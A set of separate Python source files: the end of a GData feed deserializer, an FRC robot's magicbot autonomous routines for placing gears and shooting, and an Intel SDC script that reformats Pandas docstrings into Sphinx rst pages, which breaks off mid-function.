    """Deserialize a GBaseItemTypesFeed instance from its XML string form."""
    parsed = atom.CreateClassFromXMLString(GBaseItemTypesFeed, xml_string)
    return parsed
| |
from magicbot.state_machine import state, timed_state
from .base_auto import VictisAuto
from components import swervedrive, gearpicker, shooter
from controllers.pos_controller import XPosController, YPosController
from controllers.angle_controller import AngleController, MovingAngleController
from controllers.position_history import PositionHistory
from controllers.position_tracker import PositionTracker
import wpilib
from networktables import NetworkTable
from magicbot.magic_tunable import tunable
class RightSideGearPlace(VictisAuto):
    """Autonomous mode: drive out, rotate toward the peg, place a gear,
    back away, and cross the line.

    Place robot 15in from string 90deg to string.
    """

    MODE_NAME = 'Right side gear place'
    DEFAULT = False
    # Mirroring factor applied to rotations/rcw: +1 right side, -1 left side
    # (see LeftSideGearPlace / ShootLeftSideGearPlace subclasses).
    DIRECTION = 1

    # Components and controllers injected by the magicbot framework.
    drive = swervedrive.SwerveDrive
    gear_picker = gearpicker.GearPicker
    x_ctrl = XPosController
    y_ctrl = YPosController
    angle_ctrl = AngleController
    moving_angle_ctrl = MovingAngleController
    tracker = PositionTracker

    # Tunables adjustable over NetworkTables (distances / degrees —
    # units depend on the position controllers; TODO confirm).
    out_distance = tunable(7.5)
    rotate_to_angle = tunable(-60)
    wiggle_value = tunable(-5)
    to_gear_distance = tunable(2)
    drive_back_distance = tunable(-2.7)
    drive_past_line_distance = tunable(5)

    @timed_state(duration=7, next_state='failed', first=True)
    def drive_out(self, initial_call):
        # Go forward
        if initial_call:
            self.drive.field_centric = False
            self.gear_picker._picker_state = 2
            self.angle_ctrl.reset_angle()
            self.tracker.enable()
        self.y_ctrl.move_to(self.out_distance)
        self.moving_angle_ctrl.align_to(0)
        if self.y_ctrl.is_at_location():
            self.next_state('rotate')

    @timed_state(duration=5, next_state='failed')
    def rotate(self):
        # Turn toward the peg; DIRECTION mirrors the angle for the left side.
        self.angle_ctrl.align_to(self.rotate_to_angle * self.DIRECTION)
        if self.angle_ctrl.is_aligned():
            self.next_state('drive_to_gear')

    @timed_state(duration=0.5, next_state='drive_to_gear')
    def check_rotate(self):
        # NOTE(review): no visible transition enters 'check_rotate' — 'rotate'
        # goes straight to 'drive_to_gear'. Possibly dead code; confirm.
        if not self.angle_ctrl.is_aligned_to(self.rotate_to_angle * self.DIRECTION):
            self.next_state('rotate')

    @timed_state(duration=3, next_state='rcw_with_gear')
    def drive_to_gear(self, initial_call):
        if initial_call:
            self.tracker.reset()
        self.y_ctrl.move_to(self.to_gear_distance)
        self.moving_angle_ctrl.align_to(self.rotate_to_angle * self.DIRECTION)
        if self.y_ctrl.is_at_location():
            # Release the gear (_picker_state 1) and retreat.
            self.gear_picker._picker_state = 1
            self.next_state('drive_back')

    @timed_state(duration=1, next_state='try_release')
    def rcw_with_gear(self):
        # Fallback reached via drive_to_gear's timeout: wiggle (rotate in
        # place) while pushing toward the peg to seat the gear.
        self.y_ctrl.move_to(self.to_gear_distance)
        self.drive.set_raw_rcw(0.4 * self.DIRECTION)
        if self.y_ctrl.is_at_location():
            self.drive.set_raw_rcw(0.0)
            self.gear_picker._picker_state = 1
            self.next_state('drive_back')

    @state
    def try_release(self):
        # Last resort: drop the gear where we are and retreat.
        self.drive.debug()
        self.gear_picker._picker_state = 1
        self.next_state('drive_back')

    @timed_state(duration=5, next_state='failed')
    def drive_back(self, initial_call):
        if initial_call:
            self.tracker.reset()
        self.y_ctrl.move_to(self.drive_back_distance)
        self.moving_angle_ctrl.align_to(self.rotate_to_angle * self.DIRECTION)
        if self.y_ctrl.is_at_location():
            self.next_state('rotate_back')

    @state
    def rotate_back(self):
        """Square back up to heading 0 before crossing the line.

        IF MODIFIED: Function in ShootLeftGearPlace must be modified too."""
        self.angle_ctrl.align_to(0)
        if self.angle_ctrl.is_aligned():
            self.next_state('drive_past_line')

    @state
    def drive_past_line(self, initial_call):
        if initial_call:
            self.tracker.reset()
        self.moving_angle_ctrl.align_to(0)
        self.y_ctrl.move_to(self.drive_past_line_distance)
        if self.y_ctrl.is_at_location():
            self.next_state('finish')
class LeftSideGearPlace(RightSideGearPlace):
    """Mirror of RightSideGearPlace: identical sequence with DIRECTION = -1.

    Place robot 15in from string 90deg to string."""

    MODE_NAME = 'Left side gear place'
    DEFAULT = False
    DIRECTION = -1
class ShootLeftSideGearPlace(RightSideGearPlace):
    """Left-side gear place that then turns toward the boiler and shoots.

    Place robot 15in from string 90deg to string."""

    MODE_NAME = 'Shoot left side gear place'
    DEFAULT = False
    DIRECTION = -1

    # Back up farther than the base mode to make room for the turn.
    drive_back_distance = tunable(-4)
    at_tower_angle = tunable(40)

    shooter = shooter.Shooter
    x_ctrl = XPosController

    @state
    def rotate_back(self):
        """Override: instead of squaring up to 0, turn to the boiler and shoot.

        IF MODIFIED: Function in RightSideGearPlace must be modified too."""
        self.angle_ctrl.align_to(self.at_tower_angle)
        if self.angle_ctrl.is_aligned():
            self.drive.set_raw_rcw(0.0)
            self.next_state('sit_and_shoot')
            self.shooter.shoot()

    @timed_state(duration=8, next_state='finish')
    def sit_and_shoot(self):
        # Keep feeding the shooter until the timed state expires.
        self.shooter.shoot()
class MiddleGearPlace(VictisAuto):
    """Autonomous mode: drive straight ahead from the middle position,
    place the gear, and back away."""

    MODE_NAME = 'Middle Gear Place'
    DEFAULT = False

    # Components and controllers injected by the magicbot framework.
    drive = swervedrive.SwerveDrive
    gear_picker = gearpicker.GearPicker
    x_ctrl = XPosController
    y_ctrl = YPosController
    angle_ctrl = AngleController
    moving_angle_ctrl = MovingAngleController
    tracker = PositionTracker

    out_distance = tunable(6)
    #drive_back_distance = tunable(-3)
    # NOTE(review): drive_back() reads self.drive_back_distance, but the
    # tunable above is commented out and this class does not inherit one —
    # only the ShootMiddleGearPlace subclass defines it. Confirm intent.
    strafe_distance = tunable(8)
    drive_past_line_distance = tunable(8)

    @timed_state(duration=4, next_state='rcw_with_gear', first=True)
    def drive_out(self, initial_call):
        # Go forward
        if initial_call:
            self.drive.field_centric = False
            self.gear_picker._picker_state = 2
            self.angle_ctrl.reset_angle()
            self.tracker.enable()
        self.y_ctrl.move_to(self.out_distance)
        self.moving_angle_ctrl.align_to(0)
        if self.y_ctrl.is_at_location():
            # Release the gear (_picker_state 1) and retreat.
            self.gear_picker._picker_state = 1
            self.next_state('drive_back')

    @timed_state(duration=1, next_state='try_release')
    def rcw_with_gear(self):
        # Fallback reached via drive_out's timeout: keep pushing forward
        # (the wiggle rotation is currently disabled).
        self.y_ctrl.move_to(self.out_distance)
        #self.drive.set_raw_rcw(0.4)
        if self.y_ctrl.is_at_location():
            self.drive.set_raw_rcw(0.0)
            self.gear_picker._picker_state = 1
            self.next_state('drive_back')

    @state
    def try_release(self):
        # Last resort: drop the gear where we are and retreat.
        self.drive.debug()
        self.gear_picker._picker_state = 1
        self.next_state('drive_back')

    @timed_state(duration=5, next_state='failed')
    def drive_back(self, initial_call):
        if initial_call:
            self.tracker.reset()
        self.y_ctrl.move_to(self.drive_back_distance)
        self.moving_angle_ctrl.align_to(0)
        if self.y_ctrl.is_at_location():
            self.next_state('finish')

    # Disabled states kept for reference (strafe around the airship and
    # cross the line); re-enable by unquoting.
    """
    @timed_state(duration=6, next_state='failed')
    def strafe_distance(self, initial_call):
        if initial_call:
            self.tracker.reset()
        self.x_ctrl.move_to(self.drive_back_distance)
        self.moving_angle_ctrl.align_to(0)
        if self.x_ctrl.is_at_location():
            self.next_state('drive_past_line')

    @timed_state(duration=6, next_state='failed')
    def drive_past_line(self, initial_call):
        if initial_call:
            self.tracker.reset()
        self.y_ctrl.move_to(self.drive_past_line_distance)
        self.moving_angle_ctrl.align_to(0)
        if self.y_ctrl.is_at_location():
            self.next_state('finish')
    """
class ShootMiddleGearPlace(MiddleGearPlace):
    """Middle gear place that then strafes toward the boiler and shoots."""

    MODE_NAME = 'Shoot middle Gear Place'
    DEFAULT = False

    # Re-declared component/controller injections (same as the base class).
    drive = swervedrive.SwerveDrive
    gear_picker = gearpicker.GearPicker
    shooter = shooter.Shooter
    x_ctrl = XPosController
    y_ctrl = YPosController
    angle_ctrl = AngleController
    moving_angle_ctrl = MovingAngleController

    # Defines the drive_back_distance the base class's drive_back() needs.
    drive_back_distance = tunable(-3)
    strafe_tower_distance = tunable(-4)
    at_tower_angle = tunable(55)

    @timed_state(duration=5, next_state='failed')
    def drive_back(self, initial_call):
        # Override: after backing away, strafe toward the boiler instead of
        # finishing.
        if initial_call:
            self.tracker.reset()
        self.y_ctrl.move_to(self.drive_back_distance)
        self.moving_angle_ctrl.align_to(0)
        if self.y_ctrl.is_at_location():
            self.next_state('strafe_tower')

    @timed_state(duration=6, next_state='failed')
    def strafe_tower(self, initial_call):
        if initial_call:
            self.tracker.reset()
        self.x_ctrl.move_to(self.strafe_tower_distance)
        self.moving_angle_ctrl.align_to(0)
        # Spin up the shooter early so it is at speed when we arrive.
        self.shooter.force_spin()
        if self.x_ctrl.is_at_location():
            self.next_state('align_to_tower')

    @timed_state(duration=5, next_state='failed')
    def align_to_tower(self):
        self.angle_ctrl.align_to(self.at_tower_angle)
        self.shooter.force_spin()
        if self.angle_ctrl.is_aligned():
            self.drive.set_raw_rcw(0.0)
            self.next_state('check_angle')
            self.shooter.force_spin()

    @timed_state(duration=0.5, next_state='sit_and_shoot')
    def check_angle(self):
        # Brief settle window: if the heading drifted, go back and re-align.
        if not self.angle_ctrl.is_aligned_to(self.at_tower_angle):
            self.next_state('align_to_tower')

    @timed_state(duration=8, next_state='finish')
    def sit_and_shoot(self):
        # Feed and fire until the timed state expires.
        self.drive.debug(debug_modules=True)
        self.shooter.force_spin()
        self.shooter.force_feed()
| |
# -*- coding: utf-8 -*-
# *****************************************************************************
# Copyright (c) 2020, Intel Corporation All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# *****************************************************************************
import os
import re

import pandas

from sdc_object_utils import init_pandas_structure, init_sdc_structure, init_pandas_sdc_dict
from sdc_object_utils import get_sdc_object_by_pandas_name, get_obj
from sdc_object_utils import get_class_methods, get_class_attributes, get_fully_qualified_name
from sdc_doc_utils import is_sdc_user_guide_header, get_indent, reindent, get_short_description
from sdc_doc_utils import split_in_sections, get_docstring, create_heading_str, cut_sdc_dev_guide
# Input rst templates that drive the API Reference generation
# (one template per documented Pandas namespace).
APIREF_TEMPLATE_FNAMES = [
    './_templates/_api_ref.pandas.series_templ.rst',
    './_templates/_api_ref.pandas.dataframe_templ.rst',
    './_templates/_api_ref.pandas.window_templ.rst',
]
# Output directory where the generated per-API rst files are written.
APIREF_REL_PATH = './_api_ref/'
def reformat(text):
    """
    Applies the full series of transformations that fix Pandas docstrings which
    cause Sphinx to generate warnings.
    :param text: Original text with warnings
    :return: Modified text that fixes warnings
    """
    # Order matters: star-list replacement must run before asterisk escaping,
    # and blank-line collapsing must run last to clean up after the others.
    pipeline = (
        reformat_replace_star_list_with_dash_list,
        reformat_asterisks,                      # Fix for * and ** symbols
        reformat_explicit_markup,                # Explicit markup without a blank line
        reformat_bullet_list,                    # Bullet list indentation issues
        reformat_remove_unresolved_references,   # Leftovers of removed References sections
        reformat_remove_multiple_blank_lines,
    )
    for transform in pipeline:
        text = transform(text)
    return text
def reformat_remove_unresolved_references(text):
    """
    Fixes unresolved references after removing References sections.

    Deletes every reStructuredText citation of the form ``[<digits>]_`` from the
    text. Intel SDC docs never use this pattern, so any occurrence comes from a
    removed Pandas References section and would otherwise trigger an
    "unresolved reference" Sphinx warning.
    :param text: Original text
    :return: Reformatted text with all ``[<digits>]_`` references removed
    """
    # ``\d*`` (not ``+``): the previous hand-rolled scanner also removed the
    # degenerate ``[]_`` form, so keep that behaviour. Using a regex also fixes
    # the scanner's miss of references directly preceded by another '['
    # (e.g. '[[1]_' kept its reference).
    return re.sub(r'\[\d*\]_', '', text)
def reformat_replace_star_list_with_dash_list(text):
    """
    Replaces bullet lists starting with `*` with the lists starting with `-`
    :param text: Original text
    :return: New text (newline-terminated) without `*` bullet lists
    """
    def _dashify(line):
        # Only bullet lines are touched; the first '* ' on such a line is the
        # marker itself (anything before it is indentation whitespace).
        if line.strip().startswith('* '):
            return line.replace('* ', '- ', 1)
        return line

    return ''.join(_dashify(line) + '\n' for line in text.split('\n'))
def reformat_remove_multiple_blank_lines(text):
    """
    Removes redundant blank lines
    After multiple passes of the text reformatting there could be redundant blank lines
    between sections. This pass collapses runs of consecutive blank lines down to a
    single blank line between sections.
    :param text: Original text
    :return: Text with removed redundant blank lines
    """
    # Collapse to a fixed point: each replace pass shortens runs of blank
    # lines by one, so loop until no triple newline remains.
    while '\n\n\n' in text:
        text = text.replace('\n\n\n', '\n\n')
    return text
def reformat_bullet_list(text):
    """
    Fixes indentation of multi-line bullet-list items.

    A line whose stripped form starts with ``- `` opens a bullet; subsequent
    non-blank lines are treated as its continuation and re-indented four spaces
    deeper than the bullet marker. A blank line closes the bullet.
    :param text: Original text
    :return: Reformatted text (newline-terminated)
    """
    pieces = []
    active_indent = -1  # indent of the open bullet, or -1 when outside a list
    for line in text.split('\n'):
        stripped = line.strip()
        if stripped.startswith('- '):
            # New bullet: remember its indent to re-align continuation lines.
            active_indent = get_indent(line)
            pieces.append(line)
        elif stripped == '':
            # Blank line terminates a multi-line bullet.
            active_indent = -1
            pieces.append('')
        elif active_indent >= 0:
            # Continuation of a multi-line bullet item.
            pieces.append(reindent(line, active_indent + 4))
        else:
            # Regular text outside any bullet list.
            pieces.append(line)
    return '\n'.join(pieces) + '\n'
def reformat_explicit_markup(text):
    """
    Fixes Pandas docstring warnings about explicit markup not followed by a blank line.

    For ``versionchanged``/``versionadded``/``deprecated``/anchor (``.. _``)
    directives a blank line is inserted after the directive when missing.
    For ``note``/``warning`` directives the blank line immediately after the
    directive is removed (their content must follow directly) and the directive
    is de-indented. Reference definitions (``.. [``) are dropped entirely.
    :param text: Original text with warnings
    :return: Modified text that fixes warnings
    """
    lines = text.split('\n')
    new_text = ''
    while lines:
        line = lines.pop(0)
        stripped = line.strip()
        if stripped.startswith(('.. versionchanged', '.. versionadded',
                                '.. deprecated', '.. _')):
            new_text += line + '\n'
            # Insert a blank line only when one is missing.
            # Fixes two bugs in the previous version: ``lines[1].strip != ''``
            # compared the bound method (always truthy), so a blank line was
            # inserted unconditionally, and a duplicated pop() silently
            # dropped the line following the directive from the output.
            if lines and lines[0].strip() != '':
                new_text += '\n'
        elif stripped.startswith(('.. note', '.. warning')):
            new_text += stripped + '\n'
            if lines and lines[0].strip() == '':
                # Blank line after note/warning: remove it so the content
                # attaches to the directive.
                lines.pop(0)
        elif stripped.startswith('.. ['):
            new_text += '\n'  # Remove references
        else:
            new_text += line + '\n'
    return new_text
def reformat_asterisks(text):
    r"""
    Fixes Pandas docstring warnings about ``*`` and ``**`` without a matching closer.

    Unpaired single/double asterisks are escaped to ``\*`` / ``\*\*`` so Sphinx
    does not treat them as unterminated emphasis markers. Balanced ``*italic*``
    and ``**bold**`` pairs are left untouched.
    :param text: Original text with warnings
    :return: Modified text that fixes warnings
    """
    lines = text.split('\n')
    new_text = ''
    for line in lines:
        idx = 0  # Current parsing position within ``line``
        while idx < len(line):
            idx1 = line.find('*', idx)
            if idx1 < 0:
                break  # No asterisks left in this line
            idx2 = line.find('*', idx1 + 1)
            if idx2 == -1:
                # Only one single asterisk remains - escape this occurrence
                # in place. (The previous ``line.replace('*', ...)`` rewrote
                # the whole line and re-escaped already balanced pairs
                # earlier in it.)
                line = line[:idx1] + '\\*' + line[idx1+1:]
                idx = idx1 + 2
            elif idx2 == idx1 + 1:
                # Double asterisk starting at idx1
                idx2 = line.find('**', idx1 + 2)
                if idx2 == -1:
                    # Unpaired double asterisk - escape this occurrence only
                    line = line[:idx1] + '\\*\\*' + line[idx1+2:]
                    idx = idx1 + 4
                else:
                    # Balanced ``**bold**`` pair - continue after the closer
                    idx = idx2 + 2
            else:
                # A second, separate single asterisk exists after the first
                if idx2 + 1 < len(line) and line[idx2+1] == '*':
                    # The second one opens a '**', so the first is a lone
                    # single: escape it. The '**' (shifted right by one by
                    # the inserted backslash) is handled next iteration.
                    line = line[:idx1] + '\\*' + line[idx1+1:]
                    idx = idx2 + 1
                else:
                    # Balanced ``*italic*`` pair (or the pair ends the line)
                    idx = idx2 + 1
        new_text += line + '\n'
    return new_text
def reformat_pandas_params(title, text):
    """
    Re-formats ``text`` written in NumPy style documenting Parameters, Returns, Raises sections into
    explicit `:<param>:` style.
    Algorithm searches for the pattern:
        `<alpha_numeric_value> : <text>`
        `<text continued with indent>`
        `<text continued with indent>`
    Reformat to the following:
        `:<alpha_numeric_value>:`
            `<text>`
            `<text continued with indent>`
            `<text continued with indent>`
    :param title: Section title ('Parameters', 'Return'/'Returns' or 'Raises'); selects the rewrite rule
    :param text: Section body in NumPy docstring style
    :return: Reformatted text (``text`` unchanged for any other title)
    """
    # Internal function. Returns correct markup for :param <param>:, :return:, and :raises <exception>:
    # NOTE(review): implicitly returns None for any other title; callers only
    # invoke it for the three known section titles.
    def _get_param_text(title, param):
        title = title.strip()
        if title == 'Parameters':
            return ':param ' + param + ':'
        elif title == 'Return' or title == 'Returns':
            return ':return:'
        elif title == 'Raises':
            return ':raises:'
    # Internal function. Returns correct markup for Parameters section
    def _reformat_parameters(title, text):
        lines = text.split('\n')
        new_text = ''
        if len(lines) == 0:
            return new_text
        indent = get_indent(text)
        param = ''        # name of the parameter currently being collected
        description = ''  # its (possibly multi-line) description
        while len(lines) > 0:
            line = lines[0]
            line = line.strip()
            idx = line.find(' : ')
            # NOTE(review): '&' binds tighter than '>=', so this parses as
            # ``idx >= (0 & line[0:idx].isalnum())`` which reduces to
            # ``idx >= 0`` -- the isalnum() guard is never applied. A literal
            # fix to ``and`` would also have to permit underscores in names
            # (e.g. 'n_ldparams'), so the behaviour is kept as-is here.
            if idx >= 0 & line[0:idx].isalnum():
                # Check if previous parameter existed. If so, need to add it to reformatted text
                if param != '':
                    new_text += _get_param_text(title, param) + '\n' + reindent(description, indent+4) + '\n'
                # Found parameter. Extract the description (can be multi-line)
                param = line[0:idx]
                description = line[idx+3:] + '\n'
                lines.pop(0)
            else:
                # There is no parameter description starting in this line.
                # Check if it is continuation of parameter description from previous lines
                if param != '':
                    # It is continuation of multi-line parameter description
                    description += reindent(line, indent+4) + '\n'
                else:
                    # This is not the description of parameter. Copy as is
                    new_text += reindent(line, indent) + '\n'
                lines.pop(0)
        # Flush the last parameter parsed (the loop only flushes on the next match)
        if param != '' and description != '':
            new_text += _get_param_text(title, param) + '\n' + reindent(description, indent+4) + '\n'
        return new_text
    # Internal function. Returns correct markup for Raises section
    def _reformat_raises(title, text):
        lines = text.split('\n')
        new_text = ''
        if len(lines) == 0:
            return new_text
        indent = get_indent(text)
        param = ''
        description = ''
        while len(lines) > 0:
            line = lines[0]
            line = line.strip()
            # Check if it is continuation of parameter description from previous lines
            if param != '':
                # It is continuation of multi-line parameter description
                description += reindent(line, indent + 8) + '\n'
            else:
                # This is the first line of ``raises`` description
                param = _get_param_text(title, '') + '\n' + reindent(line, indent + 4)
                new_text += param + '\n'
            lines.pop(0)
        if param != '' and description != '':
            new_text += reindent(description, indent + 8) + '\n'
        return new_text + '\n'
    # Internal function. Returns correct markup for Returns section
    def _reformat_returns(title, text):
        lines = text.split('\n')
        new_text = ''
        if len(lines) == 0:
            return new_text
        indent = get_indent(text)
        param = ''
        description = ''
        while len(lines) > 0:
            line = lines[0]
            line = line.strip()
            # Check if it is continuation of parameter description from previous lines
            if param != '':
                # It is continuation of multi-line parameter description
                description += reindent(line, indent + 4) + '\n'
            else:
                # This is the first line of ``return`` description
                param = _get_param_text(title, '') + ' ' + line
                new_text += reindent(param, indent) + '\n'
            lines.pop(0)
        if param != '' and description != '':
            new_text += reindent(description, indent + 4) + '\n'
        return new_text + '\n'
    # Dispatch on the section title; anything else is passed through untouched.
    if title.strip() == 'Parameters':
        return _reformat_parameters(title, text)
    elif title.strip() == 'Returns' or title.strip() == 'Return':
        return _reformat_returns(title, text)
    elif title.strip() == 'Raises':
        return _reformat_raises(title, text)
    else:
        return text
def generate_simple_object_doc(pandas_name, short_doc_flag=False, doc_from_pandas_flag=True, add_sdc_sections=True,
                               unsupported_warning=True, reformat_pandas=True):
    """
    Generates documentation for Pandas object obj according to flags.
    For complex objects such as modules and classes the function does not go to sub-objects,
    i.e. to class attributes and sub-modules of the module.
    :param pandas_name: Pandas object for which documentation to be generated.
    :param short_doc_flag: Flag to indicate that only short description for the object is needed.
    :param doc_from_pandas_flag: Flag to indicate that the documentation must be taken from Pandas docstring.
        This docstring can be extended with Intel SDC specific sections. These are See Also, Examples,
        Notes, Warning, Limitations, etc. if ``add_sdc_sections`` flag is set.
    :param add_sdc_sections: Flag to indicate that extra sections of the documentation need to be taken from Intel SDC.
        If ``doc_from_pandas_flag==False`` then the description section is taken from Intel SDC too. Otherwise
        Intel SDC description section will be cut and Pandas API description will be used instead.
    :param unsupported_warning: Flag, if ``True`` includes warning message if corresponding Intel SDC object is not
        found. This indicates that given SDC method is unsupported.
    :param reformat_pandas: Flag, if ``True`` re-formats Parameters section to :param: style. Needed to work around
        Sphinx generator issues for Pandas Parameters section written in NumPy style
    :return: Generated docstring.
    """
    doc = ''
    pandas_obj = get_obj(pandas_name)
    if pandas_obj is None:
        return doc  # Empty documentation for no-object
    if doc_from_pandas_flag:  # Check if documentation needs to be generated from Pandas docstring
        if short_doc_flag:  # Check if only short description is needed
            doc = get_short_description(pandas_obj)  # Short description is requested
        else:
            # Exclude Examples, Notes, See Also, References sections
            sections = split_in_sections(reindent(get_docstring(pandas_obj), 0))
            while len(sections) > 0:
                title, text = sections[0]
                if title.strip() == '':  # Description sections
                    doc += text + '\n\n'
                    sections.pop(0)
                elif title.strip() == 'Examples':  # Exclude Examples section
                    sections.pop(0)
                elif title.strip() == 'Notes':  # Exclude Notes section (may be too specific to Pandas)
                    sections.pop(0)
                elif title.strip().lower() == 'see also':  # Exclude See Also section (may be too specific to Pandas)
                    sections.pop(0)
                elif title.strip() == 'References':  # Exclude References section (may be too specific to Pandas)
                    sections.pop(0)
                elif title.strip() == 'Parameters' or title.strip() == 'Raises' or title.strip() == 'Return' or \
                        title.strip() == 'Returns':
                    # Optionally convert NumPy-style sections to :param: style
                    if reformat_pandas:
                        doc += reformat_pandas_params(title, text)
                        sections.pop(0)
                    else:
                        doc += create_heading_str(title) + '\n\n' + text + '\n\n'
                        sections.pop(0)
                else:
                    # Any other section is kept with a generated heading
                    doc += create_heading_str(title) + '\n\n' + text + '\n\n'
                    sections.pop(0)
    if not add_sdc_sections:
        if reformat_pandas:
            return reformat(doc)
        else:
            return doc
    # Here if additional sections from Intel SDC object needs to be added to pandas_obj docstring
    sdc_obj = get_sdc_object_by_pandas_name(pandas_name)
    if sdc_obj is None:
        if unsupported_warning:
            if reformat_pandas:
                doc = reformat(doc)
            if short_doc_flag:
                return doc + ' **Unsupported by Intel SDC**.'
            else:
                return doc + '\n\n.. warning::\n    This feature is currently unsupported ' \
                             'by Intel Scalable Dataframe Compiler\n\n'
    # NOTE(review): when sdc_obj is None and unsupported_warning is False,
    # control falls through to here and get_docstring(None) is called below --
    # TODO confirm get_docstring tolerates None.
    if not short_doc_flag:
        sdc_doc = get_docstring(sdc_obj)
        sdc_doc = cut_sdc_dev_guide(sdc_doc)
        # Cut description section from ``sdc_doc``
        # NOTE(review): sdc_doc[0] raises IndexError if the docstring is empty
        # after cutting the Dev Guide -- presumably upstream guarantees at
        # least one section; verify.
        if is_sdc_user_guide_header(sdc_doc[0]):  # First section is SDC User Guide header
            sdc_doc.pop(0)
        if doc_from_pandas_flag:
            # Ignore description from Intel SDC, keep Pandas description only
            while len(sdc_doc) > 0:
                title, text = sdc_doc[0]
                if title.strip() != '':
                    break
                sdc_doc.pop(0)
        # Re-indent the SDC sections to match the Pandas-derived text
        indent = get_indent(doc)
        for title, text in sdc_doc:
            if title.strip() == '':
                doc += '\n' + reindent(text, indent)
            else:
                doc += '\n' + reindent(create_heading_str(title), indent) + '\n' + \
                       reindent(text, indent) + '\n'
    return reformat(doc)
def get_rst_filename(obj_name):
    """
    Returns rst file name by respective object name.
    :param obj_name: String, object name for which file name is constructed
    :return: String, rst file name for the object being documented
    """
    # The dotted object path maps onto a directory hierarchy below the
    # API-reference output directory.
    return APIREF_REL_PATH + obj_name.replace('.', '/') + '.rst'
def open_file_for_write(file_name):
    """
    Opens file ``file_name`` for writing. If necessary, creates file directories on the path.
    :param file_name: Absolute or relative path that includes file name being created.
    :return: File descriptor created.
    """
    parent = os.path.dirname(file_name)
    # An empty dirname means the current directory, which always exists.
    if parent and not os.path.exists(parent):
        os.makedirs(parent)
    return open(file_name, 'w', encoding='utf-8')
def write_rst(file_name, docstring):
    """
    Writes ``docstring`` into the file ``file_name``.
    :param file_name: String, name of the file including relative or absolute path
    :param docstring: String, docstring to be written in the file
    """
    # Context manager guarantees the handle is closed even if write() raises;
    # the previous explicit close() leaked the descriptor on failure.
    file = open_file_for_write(file_name)
    with file:
        file.write(docstring)
def write_simple_object_rst_file(pandas_name, short_doc_flag=False, doc_from_pandas_flag=True, add_sdc_sections=True):
    """
    Renders documentation for Pandas object ``pandas_name`` (e.g. 'pandas.Series.at') into an rst file.
    The target file name is derived from ``pandas_name`` (e.g. 'pandas.Series.at.rst'). The flags are
    forwarded verbatim to :func:`generate_simple_object_doc`; see it for the details of their meaning.
    :param pandas_name: String, the name of Pandas object
    :param short_doc_flag: Flag, if ``True``, write short description of the object only
    :param doc_from_pandas_flag: Flag, if ``True``, derive the description from Pandas docstring for the object.
    :param add_sdc_sections: Flag, if ``True``, extend the docstring with respective Intel SDC sections (if any)
    """
    rendered = generate_simple_object_doc(pandas_name, short_doc_flag, doc_from_pandas_flag, add_sdc_sections)
    # Unknown objects yield no documentation -- nothing to write.
    if rendered is None or rendered == '':
        return
    write_rst(get_rst_filename(pandas_name), rendered)
def parse_templ_rst(fname_templ):
    """
    Parses input template rst file and outputs the final rst file
    Template document must have the following structure:
        Heading or subheading
        *********************
        Any text (if any)
        Another heading or subheading
        -----------------------------
        Any text (if any)
        .. currentmodule:: <module name>
        .. sdc_toctree
        <api1>
        <api2>
        <api3>
        ...
        Any text (if any)
    :param fname_templ: Path to the ``*_templ.rst`` template to expand
    """
    path, fname_out = os.path.split(fname_templ)
    # '_api_ref.pandas.x_templ.rst' -> 'api_ref.pandas.x.rst': drop the
    # '_templ' marker and the single leading underscore.
    fname_out = fname_out.replace('_templ', '')
    fname_out = fname_out.replace('_', '', 1)
    fout = open_file_for_write(APIREF_REL_PATH + fname_out)
    # NOTE(review): fout is never explicitly closed (including the early
    # ``return`` paths below); closing relies on garbage collection.
    with open(fname_templ, 'r', encoding='utf-8') as fin:
        doc = fin.readlines()
        while len(doc) > 0:
            # Parsing lines until ``.. sdc_toctree`` section is met
            while len(doc) > 0 and not doc[0].startswith('.. sdc_toctree'):
                line = doc[0]
                if line.startswith('.. currentmodule::'):
                    # Directive is 18 chars; [19:] also skips the following
                    # space, and strip() removes any extra whitespace.
                    current_module_name = line[19:].strip()
                    fout.write(line)
                doc.pop(0)
            if len(doc) == 0:
                return
            doc.pop(0)  # Skipping ``.. sdc_toctree``
            # Parsing the list of APIs
            # NOTE(review): current_module_name is unbound here if the
            # template has no ``.. currentmodule::`` before the first
            # ``.. sdc_toctree`` -- assumed guaranteed by template structure.
            while len(doc) > 0 and doc[0].strip() != '':
                line = doc[0]
                indent = get_indent(line)
                line = line.strip()
                full_name = current_module_name + '.' + line
                # Emit a cross-reference plus the API's short description
                # into the table of contents being generated.
                short_description = generate_simple_object_doc(full_name, short_doc_flag=True).strip()
                new_line = reindent(':ref:`', indent) + line + ' <' + full_name + '>`\n' + \
                    reindent(short_description, indent+4) + '\n'
                fout.write(new_line)
                doc.pop(0)
                # Write the full per-API page as an orphan rst file.
                full_description = generate_simple_object_doc(full_name, short_doc_flag=False)
                f = open_file_for_write(APIREF_REL_PATH + full_name + '.rst')
                f.write('.. _' + full_name + ':\n\n:orphan:\n\n')
                f.write(create_heading_str(full_name, '*') + '\n\n')
                f.write(full_description)
                f.close()
            if len(doc) == 0:
                return
    fout.close()
def write_class_rst_files(cls, short_doc_flag=False, doc_from_pandas_flag=True, add_sdc_sections=True):
    # Currently not in use. Should be used for auto-documenting class methods and attributes.
    qualified_prefix = get_fully_qualified_name(cls) + '.'
    # Methods first, then attributes -- one rst file per class member.
